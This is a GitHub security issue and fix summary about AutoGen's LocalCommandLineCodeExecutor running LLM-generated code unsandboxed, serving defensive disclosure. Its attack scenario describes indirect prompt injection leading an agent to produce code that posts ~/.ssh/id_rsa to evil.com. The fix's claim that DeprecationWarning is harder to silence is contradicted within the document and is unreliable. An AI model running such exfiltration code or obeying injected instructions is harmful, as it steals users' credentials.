autogen: [Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing (solved; 1 pull request, 5 comments, 5 participants)

GitHub stats
microsoft/autogen#7462, fetched 2026-04-08 01:32:43
Comments: 5 · Participants: 5 · Timeline events: 10 · Reactions: 0
Timeline (top): commented ×5, cross-referenced ×2, mentioned ×1, referenced ×1

The LocalCommandLineCodeExecutor writes LLM-generated code directly to disk and executes it as a local subprocess without any sandboxing, filesystem isolation, or network restrictions. While a UserWarning is emitted at construction time, no runtime security control prevents arbitrary code execution on the host machine.

We understand that LocalCommandLineCodeExecutor is intentionally provided as a convenience option alongside the sandboxed Docker alternative. This issue suggests strengthening the opt-in mechanism to reduce the risk of accidental production deployment without sandboxing.

Severity: HIGH
Rule: AGENT-026 (Unsandboxed Execution of LLM-Generated Code)
OWASP Agentic Security Index: ASI-09 (Improper Output Handling)
Affected files:

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (lines 391-434)

Fix Action

Fixed

PR fix notes

PR #7467: fix(security): upgrade LocalCommandLineCodeExecutor warning to DeprecationWarning

Description (problem / solution / changelog)

Summary

Fixes #7462

The LocalCommandLineCodeExecutor currently emits a UserWarning at construction time to alert developers about unsandboxed code execution. However, UserWarning is easily suppressed in production configurations (e.g., python -W ignore, logging pipelines that filter warnings), which means the security message can be silently swallowed.

This PR makes the warning harder to accidentally suppress by:

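  • Upgrading from UserWarning to DeprecationWarning, which the PR describes as visible by default in __main__ contexts. Note that Python's default filters show DeprecationWarning only when it is attributed to code in __main__ and ignore it elsewhere, while UserWarning is shown by default; -W ignore suppresses both categories
  • Adding a logger.warning() call, so the security message also reaches logging pipelines that don't capture Python warnings (dual-channel notification)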
  • Improving the warning message — clearer description of the risk with a link to the code executors documentation
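
The dual-channel notification described above can be sketched as follows. This is a minimal illustration, not the code from the PR: the helper name warn_unsandboxed and the exact message text are assumptions made for the example.

```python
import logging
import warnings

# Module-level logger, as the PR describes adding.
logger = logging.getLogger(__name__)

# Illustrative wording; not the exact message used in the PR.
UNSANDBOXED_MESSAGE = (
    "LocalCommandLineCodeExecutor executes LLM-generated code directly on your "
    "machine without sandboxing. Consider DockerCommandLineCodeExecutor instead."
)


def warn_unsandboxed() -> None:
    """Hypothetical helper: report the risk on two independent channels."""
    # Channel 1: the warnings machinery, controlled by -W flags and warning filters.
    # stacklevel=2 attributes the warning to the caller of this helper.
    warnings.warn(UNSANDBOXED_MESSAGE, DeprecationWarning, stacklevel=2)
    # Channel 2: the logging system, controlled by logger levels and handlers.
    logger.warning(UNSANDBOXED_MESSAGE)
```

Because the two channels are filtered by different mechanisms, silencing one (for example with -W ignore) leaves the other intact.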

Changes

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py:
    • Added module-level logger
    • Changed warning type from UserWarning to DeprecationWarning
    • Added logger.warning() for logging pipeline visibility
    • Improved warning message text with documentation link
  • python/packages/autogen-ext/tests/code_executors/test_commandline_code_executor.py:
    • Added test for the new DeprecationWarning behavior

Backward Compatibility

This change is fully backward compatible:

  • No API changes — constructor signature unchanged
  • No behavioral changes — code execution works identically
  • Warning is still emitted (just with a different type that is harder to suppress)
  • Existing code that filters or catches UserWarning keeps running, but it no longer matches this warning, because DeprecationWarning is a separate category and not a subclass of UserWarning

Test plan

  • Existing tests should pass (warning type change does not affect restart test which uses a separate UserWarning)
  • New test verifies DeprecationWarning is emitted on construction
  • Manual verification: instantiate LocalCommandLineCodeExecutor and confirm warning is visible

🤖 Generated with Claude Code

Changed files

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (modified, +11/-4)
  • python/packages/autogen-ext/tests/code_executors/test_commandline_code_executor.py (modified, +5/-0)


[Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing

Vulnerability Details

The executor writes LLM-generated code to a temporary file and runs it directly via asyncio.create_subprocess_exec:

Affected code (local/__init__.py:391-434):

written_file = (self.work_dir / filename).resolve()
with written_file.open("w", encoding="utf-8") as f:
    f.write(code)  # <-- LLM-generated code written to disk
file_names.append(written_file)

# ... environment setup ...

program = sys.executable  # or lang_to_cmd(lang) for non-Python
extra_args = [str(written_file.absolute())]

task = asyncio.create_task(
    asyncio.create_subprocess_exec(
        program,
        *extra_args,               # <-- executed without sandboxing
        cwd=self.work_dir,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
        env=env,
    )
)

The only "safeguard" is a UserWarning at initialization (__init__.py:163-168):

warnings.warn(
    "Using LocalCommandLineCodeExecutor may execute code on the local machine which can be unsafe. "
    "For security, it is recommended to use DockerCommandLineCodeExecutor instead.",
    UserWarning,
    stacklevel=2,
)

A warning is informational, not a security control. It is silently swallowed whenever warnings are filtered, e.g., when -W ignore is set or when a logging pipeline drops warnings.
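
How a filter swallows the warning can be reproduced with the standard warnings module alone. The sketch below uses a hypothetical helper, count_visible, and applies the "ignore" action in-process, which is comparable to running with -W ignore; it checks both warning categories discussed in this issue.

```python
import warnings


def count_visible(category: type[Warning], action: str) -> int:
    """Return how many warnings of `category` survive a filter with `action`."""
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter(action)  # "ignore" is comparable to python -W ignore
        warnings.warn("unsandboxed execution", category)
        return len(caught)


for category in (UserWarning, DeprecationWarning):
    print(category.__name__, count_visible(category, "always"), count_visible(category, "ignore"))
# prints:
# UserWarning 1 0
# DeprecationWarning 1 0
```

Both categories disappear under "ignore", so neither one acts as a runtime control.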

Attack Scenario

  1. A user deploys an AutoGen agent using LocalCommandLineCodeExecutor (following quickstart examples or for simplicity)
  2. The agent interacts with untrusted data (e.g., user messages, web content, documents)
  3. Through indirect prompt injection, the LLM is tricked into generating malicious code:
    import os
    import subprocess
    subprocess.run(["curl", "-X", "POST", "https://evil.com/exfil",
                    "-d", open(os.path.expanduser("~/.ssh/id_rsa")).read()])
  4. The code is written to disk and executed with full host privileges

Impact

  • Full system compromise: Arbitrary code execution with the privileges of the Python process
  • Credential theft: Access to SSH keys, cloud credentials, API tokens, environment variables
  • Lateral movement: Ability to scan internal networks, establish reverse shells, pivot to other systems
  • Data destruction: Unrestricted filesystem access (read, write, delete)

Suggested Fix

Upgrade the warning from UserWarning to DeprecationWarning. Python shows DeprecationWarning by default when it is triggered from __main__ and ignores it by default elsewhere; like any warning, it can still be filtered explicitly (for example with -W ignore):

# In local/__init__.py, line ~163:
warnings.warn(
    "LocalCommandLineCodeExecutor executes LLM-generated code directly on your machine "
    "without sandboxing. Consider using DockerCommandLineCodeExecutor for production use. "
    "See https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/tutorial/code-executors.html",
    DeprecationWarning,  # Changed from UserWarning — visible by default, harder to silence
    stacklevel=2,
)

Fix approach: A single-line change (UserWarning → DeprecationWarning) that makes the warning significantly harder to accidentally suppress while maintaining full backward compatibility.

Future Considerations

For longer-term hardening, the team may also want to consider:

  1. Explicit opt-in: Add a require_explicit_opt_in parameter that raises ValueError unless the user explicitly acknowledges the risk
  2. Static analysis gate: Before execution, scan LLM-generated code for dangerous imports (os, subprocess, socket, shutil) and require explicit approval
  3. Filesystem restriction: Use work_dir as a boundary, rejecting code that references paths outside it
  4. Deprecation path: Consider defaulting to Docker/Azure executors in future major versions
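
The first three considerations above could look roughly like the sketch below. Everything here is hypothetical: the function names, the allow_unsandboxed flag, and the deny-list are assumptions made for illustration and are not part of AutoGen. The import scan only sees literal import statements and is easy to evade (for example via __import__), and the path check validates file locations only, not what a running script touches, so neither replaces a sandbox.

```python
import ast
from pathlib import Path

# Hypothetical deny-list, taken from the modules named in the list above.
DANGEROUS_MODULES = {"os", "subprocess", "socket", "shutil"}


def require_opt_in(allow_unsandboxed: bool) -> None:
    """Raise unless the caller explicitly acknowledges unsandboxed execution."""
    if not allow_unsandboxed:
        raise ValueError("Unsandboxed local execution requires allow_unsandboxed=True.")


def find_dangerous_imports(code: str) -> set[str]:
    """Return the deny-listed top-level modules that `code` imports."""
    found: set[str] = set()
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        # "os.path" counts as "os": compare on the top-level package name.
        found.update(name.split(".")[0] for name in names)
    return found & DANGEROUS_MODULES


def is_inside(work_dir: Path, candidate: Path) -> bool:
    """Check that `candidate` resolves to a location inside `work_dir`."""
    return candidate.resolve().is_relative_to(work_dir.resolve())
```

A caller could run require_opt_in at construction time and find_dangerous_imports before each execution, asking for approval whenever the returned set is non-empty.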

Detection

This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.

extent analysis

Fix Plan

To address the security issue, we will:

  • Upgrade the warning from UserWarning to DeprecationWarning to make it more visible and harder to silence.
  • Consider implementing additional security measures, such as explicit opt-in, static analysis gate, filesystem restriction, and deprecation path.

Verification

To verify that the fix worked:

  1. Run the LocalCommandLineCodeExecutor with the updated warning.
  2. Check that the DeprecationWarning is displayed and not silently ignored.
  3. Test the executor with a sample of LLM-generated code to ensure it still functions as expected.
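
The first two verification steps can be automated with warnings.catch_warnings. The sketch below uses a hypothetical StandInExecutor that models only the constructor warning; with autogen-ext installed, the real LocalCommandLineCodeExecutor would take its place.

```python
import warnings


class StandInExecutor:
    """Hypothetical stand-in for LocalCommandLineCodeExecutor; only the warning is modeled."""

    def __init__(self) -> None:
        warnings.warn(
            "LocalCommandLineCodeExecutor executes LLM-generated code directly on "
            "your machine without sandboxing.",
            DeprecationWarning,
            stacklevel=2,
        )


def construction_warnings() -> list[warnings.WarningMessage]:
    """Construct the executor and return every warning it emitted."""
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter("always")  # bypass other filters so nothing is hidden
        StandInExecutor()
    return list(caught)


caught = construction_warnings()
assert len(caught) == 1
assert issubclass(caught[0].category, DeprecationWarning)
assert "without sandboxing" in str(caught[0].message)
```

The "always" filter matters here: without it, the result would depend on whichever warning filters the test runner has installed.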

Extra Tips

  • Consider using the DockerCommandLineCodeExecutor instead of LocalCommandLineCodeExecutor for production use to ensure better security and isolation.
  • Regularly review and update your code to ensure you are using the latest security best practices and guidelines.
  • Use tools like agent-audit to detect and identify potential security vulnerabilities in your AI agent code.
